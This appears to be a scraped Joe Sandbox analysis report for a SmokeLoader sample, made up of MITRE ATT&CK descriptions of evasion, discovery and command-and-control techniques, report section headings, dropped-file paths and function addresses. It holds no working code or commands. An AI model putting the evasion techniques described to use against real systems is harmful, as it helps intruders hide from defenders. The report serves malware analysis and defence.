Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report P2SMn3jloH.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: SmokeLoader

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\utisvaa

C:\Users\user\AppData\Roaming\utisvaa:Zone.Identifier

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

Windows Analysis Report
P2SMn3jloH.exe

Function 00405467 Relevance: 100.1, APIs: 52, Strings: 5, Instructions: 306
libraryfileloaderCOMMON

Function 021B0110 Relevance: 22.7, APIs: 15, Instructions: 248
memorynativethreadCOMMON

Function 021B0420 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 113
COMMON

Function 004057E9 Relevance: 7.6, APIs: 5, Instructions: 59
COMMON

Function 00405353 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50
librarymemoryloaderCOMMON

Function 00405355 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49
librarymemoryloaderCOMMON

Function 021B05B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35
COMMON

Function 004112DF Relevance: 4.5, APIs: 3, Instructions: 45
COMMON

Function 00404F21 Relevance: 1.5, APIs: 1, Instructions: 38
libraryCOMMON

Function 0040E293 Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Function 0040DC4E Relevance: 1.5, APIs: 1, Instructions: 4
COMMONLIBRARYCODE

Function 00405453 Relevance: 1.3, APIs: 1, Instructions: 5
memoryCOMMON

Function 004124FC Relevance: 66.4, APIs: 44, Instructions: 432
COMMONLIBRARYCODE

Function 00405224 Relevance: 38.6, APIs: 19, Strings: 3, Instructions: 99
filestringpipeCOMMON

Function 0040A40B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58
COMMONLIBRARYCODE

Function 0041A8B0 Relevance: 1.7, APIs: 1, Instructions: 239
COMMONCrypto

Function 00410E4E Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Function 00414A7C Relevance: .4, Instructions: 384
COMMONCrypto

Function 0041465C Relevance: .4, Instructions: 378
COMMONCrypto

Function 00414250 Relevance: .4, Instructions: 361
COMMONCrypto

Function 00413E7C Relevance: .4, Instructions: 351
COMMONCrypto

Function 0040501B Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 128
COMMON

Function 0040501A Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 127
COMMON

Function 0040DD43 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57
libraryloaderCOMMONLIBRARYCODE